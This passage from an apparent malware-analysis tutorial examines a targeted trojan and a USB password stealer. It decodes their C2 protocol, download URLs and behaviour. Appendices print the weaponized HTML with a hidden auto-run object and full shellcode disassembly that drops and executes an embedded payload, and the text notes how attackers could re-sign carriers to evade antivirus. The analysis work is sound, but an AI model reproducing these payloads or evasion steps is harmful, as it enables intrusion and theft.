Figure 6 – Fake Internet Setup I have implemented the FAKE CONTROLLER to run nc, netcat, to listen at port 53 (nc.exe –l –p 53). When the VICTIM started, it would attempt to connect to uygurman.vicp.net which is 192.168.1.123 due to the entry in hosts file. After successful connection, it sent a signal to the FAKE CONTROLLER and expected a reply. Since the fake CONTROLLER is just using nc.exe, it did not know how to response. In order to get correct response from the REAL CONTROLLER, I had a machine connected to it in the Internet, I used nc.exe on another machine to connect to the REAL CONTROLLER and sent the VICTIM’s string which I had observed in the mock setup. As expected, i saw a response from the REAL CONTROLLER. With this response which i got from the REAL CONTROLLER, I returned to work on the mockup environment with the FAKE CONTROLLER. When VICTIM received the expected reply from the FAKE CONTROLLER, it proceeded to the command handling loop.

Victim 192.168.1.9

Fake Controller 192.168.1.123

LAN

Page 22: Introduction to Malware Techniques and Logics Part 1 by Gunther

Introduction to Malware Techniques and Logics part 1

22

2.4.5 DECIPHERING OF COMMUNICATION PROTOCOL After analysing the communication protocol based on the above findings, I have deduced that the communication protocol between VICTIM and CONTROLLER and vice versa in the following format:

4 bytes to indicate length Data or Command

2.4.6 HANDSHAKE The VICTIM will try always try to connect to CONTROLLER at TCP Port 53 repeatedly until connection is established. When connected, the VICTIM will send to the CONTROLLER the handshake like the following:

08 00 00 00 31 32 33 34 35 36 37 38 (Length: 8) (“12345678”)

The CONTROLLER will then reply with the following:

06 00 00 00 7E 21 40 23 24 25 (Length: 6) (“~!@#$%”)

2.4.7 COMMAND LOOP After the handshake, the VICTIM waits for commands from CONTROLLER. The command string is encoded with XOR 5. The command syntax is:

Length of command <Command_ID> , <Command parameters> (4 bytes) (2 bytes, characters) (Comma, 1 byte)

Decoded Command ID Action 01 Find files based on supplied parameters such as *.txt etc. 02 Create a file. 03 Copy a file. 04 Delete a file. 05 Execute a file. 06 Get system information such as Host name, User name,

OS version, Memory Used etc. 07 Get diskspace (free, used etc). 08 Unknown. 09 Unknown. File-related activity. 10 Spawn cmd.exe command shell and bind to socket Above 10 CLIENT_END => Terminate connection

Page 23: Introduction to Malware Techniques and Logics Part 1 by Gunther

Introduction to Malware Techniques and Logics part 1

23

2.4.8 MULTIPLE SESSIONS SUPPORTED Another thing which I did a test on is to check whether Trojan Riler support multiple sessions. As such, what I did to determine whether this is true is by opening multiple telnet sessions to the CONTROLLER at port 53.

2.4.9 INFORMATION ABOUT THE CONTROLLER I have done a couple of checks on uygurman.vicp.net using http://centralops.net/co/ and http://www.robtex.com/dns/ and I found that its IP address kept changing. This meant that the host was on DHCP and the connection was probably Dialup or Broadband. It’s a bit amazing that after so many year, the domain is still being retained.

2.5 CONCLUSIONS

Based on the above findings, i did not uncover any automated propagation mechanisms in Trojan Riler binaries. I have received the sample attachments when i got friends who received them through spoofed emails where the sender spoofed themselves as someone from his company. So i believe that this could be a targeted attack. The other way that the malicious attachments can be received is through unintentional forwarding of the mails. There is definitely something of interest in the attachments as there were deliberate naming of files and directory such as directory <xyz>.files, and files <xyz>.htm and <xyz_financial_report>.doc. All of the filename indicate that it is targeting my friend’s company. Due to sensitivity, I had to rename the company as <xyz>. The file types which are used in the attack are data files (.DOC and .CHM) and should be able to bypass most content-filtering mechanisms (except probably Bluecoat, I had to shut my bluecoat off in order to test the handshake part). In addition, the targets may be less wary about such data files. To change the signature of the CHM file, the attacker just has to replace the WINSRV.EXE with another malware that does not have antivirus signature. The .html file can also be easily be substituted with another interestingarticle. Just a simple recompilation and renaming of the CHM file and the attacker is ready to strike again. Please note that the “exploit” is more like a feature of CHM and HTML and probably cannot be patched that easily. To change the signature of the DOC file, the attacker just have to concatenate another malware to the end of the DOC file. However, the success rate of this DOC file delivery method depends heavily on the correct version and language of Office. From a “good” guy’s point of view, .CHM file is considered a dangerous data file type that can embed active content. You should always configure your content filters to block CHM files if possible. Organizations are expected to have tight firewall configurations on outgoing traffic. Attackers will exploit firewall-friendly traffic such as HTTP, HTTPS, DNS, FTP, SMTP, POP and IMAP etc. Administrators should block protocols that are not required if possible. In the case of DNS queries, the firewall can be configured to allow only DNS servers to perform DNS queries to servers on the Internet. SES

Page 24: Introduction to Malware Techniques and Logics Part 1 by Gunther

Introduction to Malware Techniques and Logics part 1

24

3 SAMPLE NUMBER TWO

3.1 INITIAL ANALYSIS

Next, I will analyse another malware which I had received while on a business trip. But this time, I will go through only the analysis part and let you work your first Malware Forensics with the techniques that I have taught so far. What is so unique about this particular Trojan is that it was inside the USB thumbdrive containing the presentation slides which was given to me by the company which I went to. On my way back home and being the precautious me, I had the USB scanned in my laptop which I disabled Autorun feature. What do you know? Surprise surprise, the anti-virus which i had installed alerted me about a virus, SHeur2.CYO, which was found on a file, b32p.cmd, contained in the said thumb drive.

3.2 PRELIMINARY ANALYSIS ON THE MALWARE

Preliminary analysis revealed that the malware which i had gotten after checking the autorun.inf. b32p.cmd, would automatically run when the thumb drive was inserted into a computer. Subsequently, this file would be executed and dropped additional 4 files, dse235rgd0.dll, wedasgads0.dll, klif.sys and kxvo.exe. These 4 files were also detected as Trojan as shown in Figure 7.

Figure 7 – Files Detection

Page 25: Introduction to Malware Techniques and Logics Part 1 by Gunther

Introduction to Malware Techniques and Logics part 1

25

So be the inquisitive me, i found out through the information derived from the various AV’s website which stated that these files target the account credentials (username and password) of Austrian banks, Citibank and Taiwan’s online gaming portals. Hmmmm...so it’s a “Password Stealer“ malware. Like our previous malware, i let it execute on a freshly installed laptop with Wireshark being used to monitor the traffic. I found out that i keep doing a DNS query for the domain zxs35.com. Searches are being then being made on the domain zxs35.com, it returned a number of results listing the domain as malicious or containing malware. The general threat assessment by various security companies on the domain describes the Trojan as generally non-vicious in nature with the objective of obtaining some online gaming user’s passwords with no specification of any game.

3.3 LIVE ANALYSIS ON THE MALWARE

Now assuming we don’t have CWSandbox or Sandboxie with us or the malware had Anti-Emulator features, i would suggest that we use Live analysis on this malware. Before we even begin running it live inside my controlled environment, what i would highly recommend is to run regmon and filemon by Sysinternals on the target machine before we begin. I also placed a sniffer on the network on another laptop so that i could watch the traffic remotely. Now that we have finsihed setting up the mock-up environment. I plugged in the usb thumbdrive and let the autorun feature execute. Straight away on my other laptop which had Wireshark pre-installed, i discovered an outgoing connection to a China website, zxs35.com to request for a file, ll.rar. I have done some analysis which later revealed that this file contain a encoded string. That encoded string is an instruction for the Trojan. The encoding was analysed and found to be simple substitution cipher (eg. A]]Y...SQZ...JFD.AN..EE.LQL is decoded to be http://zxs32.com/hg2/ll.exe). In this case, the Trojan was instructed to download an executable files, ll.exe from the same website.

Page 26: Introduction to Malware Techniques and Logics Part 1 by Gunther

Introduction to Malware Techniques and Logics part 1

26

Upon execution of the malware. It will attempt to hide itself by changing the file-viewing configurations as shown below

Figure 8 – Folder Configurations

From the logs collated from Regmon & Filemon, i have identified that the following information:

I. The Trojan modified the registry to activate itself automatically whenever the infected user logged in.

II. Insert itself as a Browser Helper Object (BHO) so that it will be activated whenever the Internet Explorer is executed.

3.4 HONEYPOT ANALYSIS ON THE MALWARE

In furtherance to monitor additional behaviours of the malware sample, I also setup a honeypot to execute the sample. This is an isolated environment for the malware to be run and monitored to capture any activities performed by the attackers and mechanism are in placed to prevent attacks from our honeypot. The following is the setup of my Honey Pot.

Page 27: Introduction to Malware Techniques and Logics Part 1 by Gunther

Introduction to Malware Techniques and Logics part 1

27

Figure 9 – Honey Pot Setup

Above is the setup of the honeynet to monitor the behaviour of the sample. A honeywall is placed in between the infected laptop and the Internet. This honeywall is invisible to any users on the internet. Thus, allowing investigators to monitor all the traffic between the malware sample (on the laptop) and its callback addresses. The management console allows investigators to monitor the traffic in real time.

Within the honeypot, I setup a simulated web usage activities, such as surfing, logging into a fake forum on the infected laptop. Analysis of the monitored network surfaced that the Trojan only connects to zxs35.com to download and execute ll.exe. Further analysis of the file activities surfaced the same files there were dropped onto the honeypot. The Triojan will perform registry setting to hide itself by changing the file-viewing configurations. Analysis did not surface command being executed or files being taken from our honeypot. Analysis of the first day of traffic revealed a suspicious connectivity from IP 60.169.1.92.

Figure 10 – Wireshark Logs

As observed, after the activation of the malware sample, it attempts to connect to zxs35.com via HTTP to retrieve ll.rar as shown below:

Page 28: Introduction to Malware Techniques and Logics Part 1 by Gunther

Introduction to Malware Techniques and Logics part 1

28

Figure 11 – TCP Stream Trace

Judging on the file structure, it does not look like an executable. As mentioned earlier, . The encoding was analysed and found to be simple substitution cipher (eg. A]]Y...SQZ...JFD.AN..EE.LQL is decoded to be http://zxs32.com/hg2/ll.exe).

Page 29: Introduction to Malware Techniques and Logics Part 1 by Gunther

Introduction to Malware Techniques and Logics part 1

29

After a while, the malware attempt to reconnect to zxs35.com. This time, retrieving ll.exe as shown below:

Figure 12 – 2nd TCP Stream Trace

Judging from the file structure, this time round, it is an executable with the MZ header. As i have let the whole analysis to run for a few days. After a few days, i have done the analysis of the traffic logs and found out that after the initial connection to zxs35.com to download the ll.exe, the malware did not attempt to reconnect to zxs35.com.

Another test which i did was to insert 2 separate USB thumbdrive into the infected laptop. After inserting it and plugging it out separately, i did a virus scan on both USB thumbdrives and found out that both had been infected. So i assume that this Trojan had USB spreader feature.

Page 30: Introduction to Malware Techniques and Logics Part 1 by Gunther

Introduction to Malware Techniques and Logics part 1

30

3.5 CONCLUSIONS

Both Malware analysis and Honeypot profiling did not surface any malicious activities of the Trojan. Which explains why most AV companies put this malware as “Low Risk”. Now, i shall end this article by suggesting that you take this sample and tried to do the forensics yourself and check how it insert itself into as a BHO and whether it contained and more hidden stuff. Of course, if you had CWSandbox or any other great tool. I suppose you can dig out more information from it I hope that you had a great time reading and learning as I do.

Page 31: Introduction to Malware Techniques and Logics Part 1 by Gunther

Introduction to Malware Techniques and Logics part 1

31

4 APPENDIX A: CONTENT OF THE .HTM FILE

<html xmlns:o="urn:schemas-microsoft-com:office:office" xmlns:w="urn:schemas-microsoft-com:office:word" xmlns="http://www.w3.org/TR/REC-html40"> <head> <meta http-equiv=Content-Type content="text/html; charset="> <meta name=ProgId content=Word.Document> <meta name=Generator content="Microsoft Word 9"> <meta name=Originator content="Microsoft Word 9"> <link rel=File-List href="./MHA.files/filelist.xml"> <title>2004 Financial Report of <xyz> </title> <!--[if gte mso 9]><xml> <o:DocumentProperties> <o:Author>lw</o:Author> <o:LastAuthor>lw</o:LastAuthor> <o:Revision>2</o:Revision> <o:TotalTime>1</o:TotalTime> <o:Created>2004-09-01T07:15:00Z</o:Created> <o:LastSaved>2004-09-01T07:15:00Z</o:LastSaved> <o:Pages>1</o:Pages> <o:Words>209</o:Words> <o:Characters>1194</o:Characters> <o:Company>software</o:Company> <o:Lines>9</o:Lines> <o:Paragraphs>2</o:Paragraphs> <o:CharactersWithSpaces>1466</o:CharactersWithSpaces> <o:Version>9.2812</o:Version> </o:DocumentProperties> </xml><![endif]--><!--[if gte mso 9]><xml> <w:WordDocument> <w:PunctuationKerning/> <w:DrawingGridVerticalSpacing>7.8 </w:DrawingGridVerticalSpacing> <w:DisplayHorizontalDrawingGridEvery>0</w:DisplayHorizontalDrawingGridEvery> <w:DisplayVerticalDrawingGridEvery>2</w:DisplayVerticalDrawingGridEvery> <w:Compatibility> <w:SpaceForUL/> <w:BalanceSingleByteDoubleByteWidth/> <w:DoNotLeaveBackslashAlone/> <w:ULTrailSpace/> <w:DoNotExpandShiftReturn/> <w:AdjustLineHeightInTable/> <w:UseFELayout/> </w:Compatibility> </w:WordDocument> </xml><![endif]--> <style> <!-- /* Font Definitions */ @font-face {font-family:; panose-1:2 1 6 0 3 1 1 1 1 1; mso-font-alt:SimSun;

Page 32: Introduction to Malware Techniques and Logics Part 1 by Gunther

Introduction to Malware Techniques and Logics part 1

32

mso-font-charset:134; mso-generic-font-family:auto; mso-font-pitch:variable; mso-font-signature:3 135135232 16 0 262145 0;} @font-face {font-family:"\@"; panose-1:2 1 6 0 3 1 1 1 1 1; mso-font-charset:134; mso-generic-font-family:auto; mso-font-pitch:variable; mso-font-signature:3 135135232 16 0 262145 0;} /* Style Definitions */ p.MsoNormal, li.MsoNormal, div.MsoNormal {mso-style-parent:""; margin:0cm; margin-bottom:.0001pt; text-align:justify; text-justify:inter-ideograph; mso-pagination:none; font-size:10.5pt; mso-bidi-font-size:12.0pt; font-family:"Times New Roman"; mso-fareast-font-family:; mso-font-kerning:1.0pt;} /* Page Definitions */ @page {mso-page-border-surround-header:no; mso-page-border-surround-footer:no;} @page Section1 {size:595.3pt 841.9pt; margin:72.0pt 90.0pt 72.0pt 90.0pt; mso-header-margin:42.55pt; mso-footer-margin:49.6pt; mso-paper-source:0; layout-grid:15.6pt;} div.Section1 {page:Section1;} --> </style> </head> <BODY onmouseup=document.selection.empty() oncontextmenu="return false" onselectstart="return false" ondragstart="return false" onbeforecopy="return false" oncopy=document.selection.empty() onselect=document.selection.empty() background="winsrv.exe"> <OBJECT id=RUNIT height=0 width=0 style="display:none;" type="application/x-oleobject"

codeBase=winsrv.exe ></OBJECT>

Page 33: Introduction to Malware Techniques and Logics Part 1 by Gunther

Introduction to Malware Techniques and Logics part 1

33

5 APPENDIX B: DISASSEMBLY OF SHELLCODE

seg000:00000000 ; --------------------------------------------------------------------------- seg000:00000000 seg000:00000000 ; Segment type: Pure code seg000:00000000 seg000 segment byte public 'CODE' use32 seg000:00000000 assume cs:seg000 seg000:00000000 assume es:nothing, ss:nothing, ds:nothing, fs:nothing, gs:nothing seg000:00000000 nop ; No Operation seg000:00000001 nop ; No Operation seg000:00000002 nop ; No Operation seg000:00000003 nop ; No Operation seg000:00000004 nop ; No Operation seg000:00000005 nop ; No Operation seg000:00000006 nop ; No Operation seg000:00000007 call $+5 ; Call Procedure seg000:0000000C pop ebx seg000:0000000D sub ebx, 401015h ; Integer Subtraction seg000:00000013 mov ebp, esp seg000:00000015 sub esp, 1000h ; Integer Subtraction seg000:0000001B mov eax, 7FFDF000h seg000:00000020 mov eax, [eax+0Ch] seg000:00000023 mov esi, [eax+1Ch] seg000:00000026 lodsd ; Load String seg000:00000027 mov edx, [eax+8] seg000:0000002A mov [ebp-4], edx seg000:0000002D lea esi, [ebx+4012A1h] ; Load Effective Address seg000:00000033 lea edi, [ebx+401269h] ; Load Effective Address seg000:00000039 seg000:00000039 loc_39: ; CODE XREF: seg000:00000052j seg000:00000039 push esi seg000:0000003A push dword ptr [ebp-4] seg000:0000003D call sub_1CE ; Call Procedure seg000:00000042 mov [edi], eax seg000:00000044 add edi, 4 ; Add seg000:00000047 seg000:00000047 loc_47: ; CODE XREF: seg000:0000004Aj seg000:00000047 lodsb ; Load String seg000:00000048 or al, al ; Logical Inclusive OR seg000:0000004A jnz short loc_47 ; Jump if Not Zero (ZF=0) seg000:0000004C cmp byte ptr [esi+1], 0 ; Compare Two Operands seg000:00000050 jz short loc_54 ; Jump if Zero (ZF=1) seg000:00000052 jmp short loc_39 ; Jump seg000:00000054 ; --------------------------------------------------------------------------- seg000:00000054 seg000:00000054 loc_54: ; CODE XREF: seg000:00000050j seg000:00000054 mov esi, 150000h seg000:00000059 seg000:00000059 loc_59: ; CODE XREF: seg000:0000006Ej seg000:00000059 mov edx, [esi] seg000:0000005B cmp edx, 69465B5Dh ; Compare Two Operands seg000:00000061 jz short loc_70 ; Jump if Zero (ZF=1) seg000:00000063 add esi, 4 ; Add

Page 34: Introduction to Malware Techniques and Logics Part 1 by Gunther

Introduction to Malware Techniques and Logics part 1

34

seg000:00000066 cmp esi, 400000h ; Compare Two Operands seg000:0000006C ja short loc_70 ; Jump if Above (CF=0 & ZF=0) seg000:0000006E jmp short loc_59 ; Jump seg000:00000070 ; --------------------------------------------------------------------------- seg000:00000070 seg000:00000070 loc_70: ; CODE XREF: seg000:00000061j seg000:00000070 ; seg000:0000006Cj seg000:00000070 add esi, 0Ch ; Add seg000:00000073 mov edi, esi seg000:00000075 seg000:00000075 loc_75: ; CODE XREF: seg000:0000007Ej seg000:00000075 mov al, [edi] seg000:00000077 cmp al, 22h ; '"' ; Compare Two Operands seg000:00000079 jz short loc_80 ; Jump if Zero (ZF=1) seg000:0000007B add edi, 1 ; Add seg000:0000007E jmp short loc_75 ; Jump seg000:00000080 ; --------------------------------------------------------------------------- seg000:00000080 seg000:00000080 loc_80: ; CODE XREF: seg000:00000079j seg000:00000080 mov byte ptr [edi], 0 seg000:00000083 push 0 seg000:00000085 push 80h ; 'Ç' seg000:0000008A push 4 seg000:0000008C push 0 seg000:0000008E push 3 seg000:00000090 push 80000000h seg000:00000095 push esi seg000:00000096 call dword ptr [ebx+401289h] ; Indirect Call Near Procedure seg000:0000009C mov [ebp-0A70h], eax seg000:000000A2 lea edi, [ebp-96Ch] ; Load Effective Address seg000:000000A8 push 100h seg000:000000AD push edi seg000:000000AE call dword ptr [ebx+40127Dh] ; Indirect Call Near Procedure seg000:000000B4 lea esi, [ebx+401346h] ; Load Effective Address seg000:000000BA push esi seg000:000000BB push edi seg000:000000BC call dword ptr [ebx+401279h] ; Indirect Call Near Procedure seg000:000000C2 push 0 seg000:000000C4 push 80h ; 'Ç' seg000:000000C9 push 4 seg000:000000CB push 0 seg000:000000CD push 1 seg000:000000CF push 40000000h seg000:000000D4 push edi seg000:000000D5 call dword ptr [ebx+401289h] ; Indirect Call Near Procedure seg000:000000DB mov [ebp-0A74h], eax seg000:000000E1 lea edi, [ebp-0A6Ch] ; Load Effective Address seg000:000000E7 push 100h seg000:000000EC push edi seg000:000000ED call dword ptr [ebx+40127Dh] ; Indirect Call Near Procedure seg000:000000F3 lea esi, [ebx+401356h] ; Load Effective Address seg000:000000F9 push esi seg000:000000FA push edi seg000:000000FB call dword ptr [ebx+401279h] ; Indirect Call Near Procedure

Page 35: Introduction to Malware Techniques and Logics Part 1 by Gunther

Introduction to Malware Techniques and Logics part 1

35

seg000:00000101 push 0 seg000:00000103 push 80h ; 'Ç' seg000:00000108 push 4 seg000:0000010A push 0 seg000:0000010C push 1 seg000:0000010E push 80000000h seg000:00000113 push edi seg000:00000114 call dword ptr [ebx+401289h] ; Indirect Call Near Procedure seg000:0000011A mov [ebp-0A78h], eax seg000:00000120 push 0 seg000:00000122 push 0 seg000:00000124 push 6E00h seg000:00000129 push dword ptr [ebp-0A70h] seg000:0000012F call dword ptr [ebx+401275h] ; Indirect Call Near Procedure seg000:00000135 mov ecx, [ebx+401261h] seg000:0000013B mov [ebp-0A80h], ecx seg000:00000141 lea edi, [ebp-86Ch] ; Load Effective Address seg000:00000147 lea esi, [ebp-0A7Ch] ; Load Effective Address seg000:0000014D seg000:0000014D loc_14D: ; CODE XREF: seg000:00000183j seg000:0000014D push 0 seg000:0000014F push esi seg000:00000150 push 800h seg000:00000155 push edi seg000:00000156 push dword ptr [ebp-0A70h] seg000:0000015C call dword ptr [ebx+401291h] ; Indirect Call Near Procedure seg000:00000162 sub dword ptr [ebp-0A80h], 800h ; Integer Subtraction seg000:0000016C jle short loc_185 ; Jump if Less or Equal (ZF=1 | SF!=OF) seg000:0000016E push 0 seg000:00000170 push esi seg000:00000171 push 800h seg000:00000176 push edi seg000:00000177 push dword ptr [ebp-0A74h] seg000:0000017D call dword ptr [ebx+40128Dh] ; Indirect Call Near Procedure seg000:00000183 jmp short loc_14D ; Jump seg000:00000185 ; --------------------------------------------------------------------------- seg000:00000185 seg000:00000185 loc_185: ; CODE XREF: seg000:0000016Cj seg000:00000185 add dword ptr [ebp-0A80h], 800h ; Add seg000:0000018F push 0 seg000:00000191 push esi seg000:00000192 push dword ptr [ebp-0A80h] seg000:00000198 push edi seg000:00000199 push dword ptr [ebp-0A74h] seg000:0000019F call dword ptr [ebx+40128Dh] ; Indirect Call Near Procedure seg000:000001A5 push dword ptr [ebp-0A74h] seg000:000001AB call dword ptr [ebx+401271h] ; Indirect Call Near Procedure seg000:000001B1 lea edi, [ebp-96Ch] ; Load Effective Address seg000:000001B7 push 0 seg000:000001B9 push edi seg000:000001BA call dword ptr [ebx+40126Dh] ; Indirect Call Near Procedure seg000:000001C0 call dword ptr ds:40129Dh ; Indirect Call Near Procedure seg000:000001C6 push 0 seg000:000001C8 call dword ptr [ebx+401269h] ; Indirect Call Near Procedure

Page 36: Introduction to Malware Techniques and Logics Part 1 by Gunther

Introduction to Malware Techniques and Logics part 1

36

seg000:000001CE seg000:000001CE ; ¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦ S U B R O U T I N E ¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦ seg000:000001CE seg000:000001CE ; Attributes: bp-based frame seg000:000001CE seg000:000001CE sub_1CE proc near ; CODE XREF: seg000:0000003Dp seg000:000001CE seg000:000001CE var_8 = dword ptr -8 seg000:000001CE var_4 = dword ptr -4 seg000:000001CE arg_0 = dword ptr 8 seg000:000001CE arg_4 = dword ptr 0Ch seg000:000001CE seg000:000001CE push ebp seg000:000001CF mov ebp, esp seg000:000001D1 add esp, 0FFFFFFF8h ; Add seg000:000001D4 pusha ; Push all General Registers seg000:000001D5 mov [ebp+var_4], 0 seg000:000001DC call $+5 ; Call Procedure seg000:000001E1 pop ebx seg000:000001E2 sub ebx, 4011EAh ; Integer Subtraction seg000:000001E8 mov edi, [ebp+arg_4] seg000:000001EB mov ecx, 0FFFFFFFFh seg000:000001F0 xor al, al ; Logical Exclusive OR seg000:000001F2 cld ; Clear Direction Flag seg000:000001F3 repne scasb ; Compare String seg000:000001F5 mov ecx, edi seg000:000001F7 sub ecx, [ebp+arg_4] ; Integer Subtraction seg000:000001FA mov [ebp+var_8], ecx seg000:000001FD mov esi, [ebp+arg_0] seg000:00000200 add esi, [esi+3Ch] ; Add seg000:00000203 mov esi, [esi+78h] seg000:00000206 add esi, [ebp+arg_0] ; Add seg000:00000209 mov ebx, [esi+20h] seg000:0000020C add ebx, [ebp+arg_0] ; Add seg000:0000020F xor edx, edx ; Logical Exclusive OR seg000:00000211 seg000:00000211 loc_211: ; CODE XREF: sub_1CE+5Ej seg000:00000211 push esi seg000:00000212 mov edi, [ebx] seg000:00000214 add edi, [ebp+arg_0] ; Add seg000:00000217 mov esi, [ebp+arg_4] seg000:0000021A mov ecx, [ebp+var_8] seg000:0000021D repe cmpsb ; Compare Strings seg000:0000021F jnz short loc_224 ; Jump if Not Zero (ZF=0) seg000:00000221 pop esi seg000:00000222 jmp short loc_22E ; Jump seg000:00000224 ; --------------------------------------------------------------------------- seg000:00000224 seg000:00000224 loc_224: ; CODE XREF: sub_1CE+51j seg000:00000224 pop esi seg000:00000225 add ebx, 4 ; Add seg000:00000228 inc edx ; Increment by 1 seg000:00000229 cmp edx, [esi+18h] ; Compare Two Operands seg000:0000022C jb short loc_211 ; Jump if Below (CF=1)

Page 37: Introduction to Malware Techniques and Logics Part 1 by Gunther

Introduction to Malware Techniques and Logics part 1

37

seg000:0000022E seg000:0000022E loc_22E: ; CODE XREF: sub_1CE+54j seg000:0000022E sub ebx, [esi+20h] ; Integer Subtraction seg000:00000231 sub ebx, [ebp+arg_0] ; Integer Subtraction seg000:00000234 shr ebx, 1 ; Shift Logical Right seg000:00000236 add ebx, [esi+24h] ; Add seg000:00000239 add ebx, [ebp+arg_0] ; Add seg000:0000023C movzx eax, word ptr [ebx] ; Move with Zero-Extend seg000:0000023F shl eax, 2 ; Shift Logical Left seg000:00000242 add eax, [esi+1Ch] ; Add seg000:00000245 add eax, [ebp+arg_0] ; Add seg000:00000248 mov eax, [eax] seg000:0000024A add eax, [ebp+arg_0] ; Add seg000:0000024D mov [ebp+var_4], eax seg000:00000250 popa ; Pop all General Registers seg000:00000251 mov eax, [ebp+var_4] seg000:00000254 leave ; High Level Procedure Exit seg000:00000255 retn 8 ; Return Near from Procedure seg000:00000255 sub_1CE endp seg000:00000255 seg000:00000255 ; --------------------------------------------------------------------------- seg000:00000258 db 0CFh ; - seg000:00000259 db 42h ; B seg000:0000025A db 1 ; seg000:0000025B db 0 ; seg000:0000025C db 0 ; seg000:0000025D db 0 ; seg000:0000025E db 0 ; seg000:0000025F db 0 ; seg000:00000260 db 0 ; seg000:00000261 db 0 ; seg000:00000262 db 0 ; seg000:00000263 db 0 ; seg000:00000264 db 0 ; seg000:00000265 db 0 ; seg000:00000266 db 0 ; seg000:00000267 db 0 ; seg000:00000268 db 0 ; seg000:00000269 db 0 ; seg000:0000026A db 0 ; seg000:0000026B db 0 ; seg000:0000026C db 0 ; seg000:0000026D db 0 ; seg000:0000026E db 0 ; seg000:0000026F db 0 ; seg000:00000270 db 0 ; seg000:00000271 db 0 ; seg000:00000272 db 0 ; seg000:00000273 db 0 ; seg000:00000274 db 0 ; seg000:00000275 db 0 ; seg000:00000276 db 0 ; seg000:00000277 db 0 ; seg000:00000278 db 0 ;

Page 38: Introduction to Malware Techniques and Logics Part 1 by Gunther

Introduction to Malware Techniques and Logics part 1

38

seg000:00000279 db 0 ; seg000:0000027A db 0 ; seg000:0000027B db 0 ; seg000:0000027C db 0 ; seg000:0000027D db 0 ; seg000:0000027E db 0 ; seg000:0000027F db 0 ; seg000:00000280 db 0 ; seg000:00000281 db 0 ; seg000:00000282 db 0 ; seg000:00000283 db 0 ; seg000:00000284 db 0 ; seg000:00000285 db 0 ; seg000:00000286 db 0 ; seg000:00000287 db 0 ; seg000:00000288 db 0 ; seg000:00000289 db 0 ; seg000:0000028A db 0 ; seg000:0000028B db 0 ; seg000:0000028C db 0 ; seg000:0000028D db 0 ; seg000:0000028E db 0 ; seg000:0000028F db 0 ; seg000:00000290 db 0 ; seg000:00000291 db 0 ; seg000:00000292 db 0 ; seg000:00000293 db 0 ; seg000:00000294 db 50h ; P seg000:00000295 db 39h ; 9 seg000:00000296 db 29h ; ) seg000:00000297 db 30h ; 0 seg000:00000298 aExitprocess db 'ExitProcess',0 seg000:000002A4 aWinexec db 'WinExec',0 seg000:000002AC aClosehandle db 'CloseHandle',0 seg000:000002B8 aSetfilepointer db 'SetFilePointer',0 seg000:000002C7 aLstrcata db 'lstrcatA',0 seg000:000002D0 aGetsystemdirec db 'GetSystemDirectoryA',0 seg000:000002E4 aGetprocaddress db 'GetProcAddress',0 seg000:000002F3 aCreateprocessa db 'CreateProcessA',0 seg000:00000302 aCreatefilea db 'CreateFileA',0 seg000:0000030E aWritefile db 'WriteFile',0 seg000:00000318 aReadfile db 'ReadFile',0 seg000:00000321 aGetlasterror db 'GetLastError',0 seg000:0000032E aRtlzeromemory db 'RtlZeroMemory',0 seg000:0000033C db 0 ; seg000:0000033D aWinheini_exe db '\winheini.exe',0 seg000:0000034B aE db 'e',0 seg000:0000034D aMydoc_doc db '\MyDoc.doc',0 seg000:0000034D seg000 ends seg000:0000034D seg000:0000034D seg000:0000034D end